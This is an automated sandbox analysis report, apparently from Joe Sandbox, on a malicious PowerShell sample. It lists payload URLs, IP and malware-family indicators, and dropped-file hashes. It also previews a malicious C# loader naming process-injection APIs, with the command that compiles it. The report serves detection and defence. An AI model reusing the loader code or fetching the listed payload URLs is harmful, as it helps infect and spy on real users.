                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:vfrcxq.ps1
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.expl.evad.winPS1@9/13@0/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 58
                                                                  • Number of non-executed functions: 6
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .ps1
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144, 13.107.246.45, 4.245.163.56
                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  02:54:02API Interceptor38x Sleep call for process: powershell.exe modified
                                                                  02:54:11API Interceptor9846777x Sleep call for process: RegAsm.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  147.45.44.131gqub.batGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131/infopage/yijth.exe
                                                                  trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131/infopage/yijth.exe
                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/hgfpj.exe
                                                                  qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/inbg.exe
                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/inbg.exe
                                                                  Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/bnkh.exe
                                                                  htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/ung0.exe
                                                                  Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/ilk.exe
                                                                  Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                                                  • 147.45.44.131/infopage/bgfi.ps1
                                                                  Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/ung0.exe
                                                                  157.20.182.177vfdjo.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                    gqub.batGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                      trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                          https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            bg.microsoft.map.fastly.nettrwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                            • 199.232.214.172
                                                                            vj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                                                                            • 199.232.210.172
                                                                            rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                            • 199.232.210.172
                                                                            2VsJzzWTpA.exeGet hashmaliciousCobaltStrikeBrowse
                                                                            • 199.232.214.172
                                                                            2VsJzzWTpA.exeGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                                                            • 199.232.210.172
                                                                            O782uurN5d.exeGet hashmaliciousDCRatBrowse
                                                                            • 199.232.210.172
                                                                            bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                            • 199.232.210.172
                                                                            46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
                                                                            • 199.232.210.172

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            FCNUniversityPublicCorporationOsakaJPvfdjo.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                            • 157.20.182.177
                                                                            gqub.batGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                            • 157.20.182.177
                                                                            trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                            • 157.20.182.177
                                                                            bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                            • 157.20.182.177
                                                                            https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                            • 157.20.182.177
                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                            • 163.227.210.66
                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                            • 157.20.21.157
                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                            • 157.20.21.140
                                                                            la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                            • 157.20.218.11
                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                            • 157.20.207.5
                                                                            FREE-NET-ASFREEnetEUgqub.batGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                            • 147.45.44.131
                                                                            trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                            • 147.45.44.131
                                                                            https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                            • 147.45.44.131
                                                                            Loader.exeGet hashmaliciousMeduza StealerBrowse
                                                                            • 147.45.44.216
                                                                            tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                            • 147.45.49.155
                                                                            soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                            • 147.45.44.216
                                                                            iviewers.dllGet hashmaliciousLummaCBrowse
                                                                            • 147.45.44.131
                                                                            search.htaGet hashmaliciousUnknownBrowse
                                                                            • 147.45.112.248
                                                                            e9aa0b4540115b3dcec3af70b6de27e54e4a0fa96d1d3.exeGet hashmaliciousRedLineBrowse
                                                                            • 147.45.44.224
                                                                            TCKxnQ5CPn.exeGet hashmaliciousUnknownBrowse
                                                                            • 147.45.49.155

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                            Category:dropped
                                                                            Size (bytes):71954
                                                                            Entropy (8bit):7.996617769952133
                                                                            Encrypted:true
                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):3.1285274432574797
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKfPF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:3kDnLNkPlE99SNxAhUe/3
                                                                            MD5:6BE432A25C85B4B6D751F34648CEB074
                                                                            SHA1:0FE95E559080AFD474CD69A8ACBE2D89251A6E05
                                                                            SHA-256:F8EF30097E5F68877AFBDA28E26647D73573EEEA91E59462F426ADEE509E1625
                                                                            SHA-512:6D044F553A859B3D30251925F44A4C37556D3C638B9EC3C9EB636CDF0BF4CEC9A7E38131CC2F64455FFE57A0204D49DCFE8B10A3E3162E6A4E4FDCB975449031
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:p...... ...........X"\..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                            MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                            SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                            SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                            SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                            Malicious:false
                                                                            Preview:@...e.................................R..............@..........

                                                                            C:\Users\user\AppData\Local\Temp\RES1079.tmp

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Jan 1 09:04:08 2025, 1st section name ".debug$S"
                                                                            Category:modified
                                                                            Size (bytes):1340
                                                                            Entropy (8bit):4.016534141519935
                                                                            Encrypted:false
                                                                            SSDEEP:24:HjdK9o0RUyLZHQwKOZmNeI+ycuZhNFakSDPNnqSed:90RXZfKOZmw1ulFa3pqS+
                                                                            MD5:746E6518BF4406181EC2A84CEC447F4D
                                                                            SHA1:FF6CD38B0A886E72751EFFD104B476E94ED8BF68
                                                                            SHA-256:C7B123BC48E32AAF6DD0CE3C244C9838B14FA31A55A2900F6D3929931458D3C4
                                                                            SHA-512:75FCE71BEE87E28172B13EEC8C6D5E973A848760AEEE8A72FAC4E1DCC022F3C6F35C4778A788C41D5C2F9F46CE6AABB467E280DBC45434DDD6442A229B33EF20
                                                                            Malicious:false
                                                                            Preview:L.....ug.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP..................;0.@X.....\..........7.......C:\Users\user~1\AppData\Local\Temp\RES1079.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.w.v.o.z.k.4.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhsqjux5.ikr.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvwayo0b.r5q.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.1079404572113574
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCqak7Ynqq/bPN5Dlq5J:+RI+ycuZhNFakSDPNnqX
                                                                            MD5:050EF53B30D94058E399AE9E031EA55C
                                                                            SHA1:DBE2EF5EE696FE0DED0E7886C05645FD4FED256D
                                                                            SHA-256:F126BDFEAE899D25B72C3244B5788D9388A44C1F5441EBC1F4DC1F4D46D57EC2
                                                                            SHA-512:5EA2207E6BFD3D55968C207809C33403A53DC116D82E878FD5888474FB21E106F4A5687DA7D892FC44DDDD3E0FE0B91DACC9B38FA0CEE3D46F8A75E24AC32441
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.w.v.o.z.k.4.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.w.v.o.z.k.4.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                            C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.0.cs

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):11063
                                                                            Entropy (8bit):4.546700076718714
                                                                            Encrypted:false
                                                                            SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo6PT:2oYLoH97t/Z7pgjvzf5uT
                                                                            MD5:B5C3A2D03FF4C721192716F326C77DEA
                                                                            SHA1:6B754FD988CA58865674B711ABA76D3C6B2C5693
                                                                            SHA-256:AB42FE5FD08CB87663E130F99F96124FDD37D825D081B9712B0BAD8B6F270FAC
                                                                            SHA-512:D32E5A98C12B6B85D1913555EA54F837CD0FC647CA945AEF9D75FFADE06506BE1F4A2348827F11C4EEAE0796E4156C8F352E3C0F9A6E2CDC93CB501BCDF2C248
                                                                            Malicious:true
                                                                            Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                                            C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):212
                                                                            Entropy (8bit):5.053376805735577
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2L/6K2cNwi23fT9QjRU0zxszIcNwi23fT9QjRWH:p37L/6KwZRQjRFzZRQjRWH
                                                                            MD5:61BA40943B3D857C6C1229ABF2584408
                                                                            SHA1:368077C271D21A728977FF1DA7B106ADBB4C0F80
                                                                            SHA-256:E1B3F3671596B5EA7BD63C6C2849CCBA4A468DCEACB36EAE092B51532D514C6D
                                                                            SHA-512:1BC9AEF074E0EA3E0C7B4E53F623A2A1C691BF88B78DCBA1B0DF9BEEB7D438669D18BEF5AEC7CCCC4041DD407D5FBDCE866AB3C65509333931F4A8AA7AC4AB73
                                                                            Malicious:true
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.0.cs"

                                                                            C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dll

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):9728
                                                                            Entropy (8bit):4.628451627296668
                                                                            Encrypted:false
                                                                            SSDEEP:192:2RH6HN4QhfNQ8q8888yYAdERjOanUxRa95MqBYzeN45F:hNxNE9Oc+a95Mq3S5F
                                                                            MD5:66E37F7F98FE2B193D703DD0C387A2CA
                                                                            SHA1:8EDF48CF1322D08B25E84C176E44736BDFAAD70D
                                                                            SHA-256:0BF28B451F5AD3D9750AFF3F17BBDA000D7A728FA53825E5A6DC2D52C7FBBBA6
                                                                            SHA-512:E176436EFB56944C2DDFE37F4F4CDCF6F8977F79CFCCC2ED69203B8B53A549E08A9E18B0E033ABA6BD1F89A0AF91795AEC24682838258489B3C74B6883CE45E9
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

                                                                            C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.out

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):716
                                                                            Entropy (8bit):5.230656238939843
                                                                            Encrypted:false
                                                                            SSDEEP:12:Ka/IR37L/6KwZRQjRFzZRQjRWOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KwIdn6KgReRTReRWOKax5DqBVKVrdFAw
                                                                            MD5:722CFBD20B0B2C368B790BD7CC050632
                                                                            SHA1:C9B7EB17D16FE286ED514B0E9D8A279C20BB9784
                                                                            SHA-256:07371626A0DB6203C5076EA48C64BA632152C3C5A99180CCE44700FDE8FC3937
                                                                            SHA-512:64FDF679E74829BFBF0311FF3E5BE23B76A05A8B103E7BBD9059E392D963B19EA4F123640DBB6D710DD295ED6541D5D7CF60FF47CEFF8F27278277835B4FD03D
                                                                            Malicious:false
                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6225
                                                                            Entropy (8bit):3.741371181042775
                                                                            Encrypted:false
                                                                            SSDEEP:48:pC2TyugCUU20srukvhkvklCyw+buW4wl6nSogZo/J/Ja7uW4wlRnSogZo/J/JO1:FTPgClr5kvhkvCCtGuW4wfHzuW4w+HZ
                                                                            MD5:50A53C4BC71B1B0DB304BBC2881FE5B4
                                                                            SHA1:5DB265D59BCC9F7D0EEDDCB84E3E3B1ECBD67AA0
                                                                            SHA-256:97BCBAF922F890B2365D2EAE4D10250606C80D34F096E50CB89F3310991480E0
                                                                            SHA-512:A070CFE5789661375B215B0646680B1D1D2D50C0B684B3C9F8D70E1DB2F6B6C1D4F2431A34B08629B6281C3D763DAFB67D7A76AF36F4141477F6A2EFFCDA62D1
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....*_...u.Q"\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....WM"\..N+.Q"\......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=!Z.>..........................3*N.A.p.p.D.a.t.a...B.V.1.....!Z.>..Roaming.@......EW.=!Z.>..........................-1W.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=!Z.>..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=!Z.>..........................~...W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=!Z.>....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=!Z.>....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=!Z.>....9...........

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CI77I2MS2YN3H1I8BN5Q.temp

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6225
                                                                            Entropy (8bit):3.741371181042775
                                                                            Encrypted:false
                                                                            SSDEEP:48:pC2TyugCUU20srukvhkvklCyw+buW4wl6nSogZo/J/Ja7uW4wlRnSogZo/J/JO1:FTPgClr5kvhkvCCtGuW4wfHzuW4w+HZ
                                                                            MD5:50A53C4BC71B1B0DB304BBC2881FE5B4
                                                                            SHA1:5DB265D59BCC9F7D0EEDDCB84E3E3B1ECBD67AA0
                                                                            SHA-256:97BCBAF922F890B2365D2EAE4D10250606C80D34F096E50CB89F3310991480E0
                                                                            SHA-512:A070CFE5789661375B215B0646680B1D1D2D50C0B684B3C9F8D70E1DB2F6B6C1D4F2431A34B08629B6281C3D763DAFB67D7A76AF36F4141477F6A2EFFCDA62D1
                                                                            Malicious:false
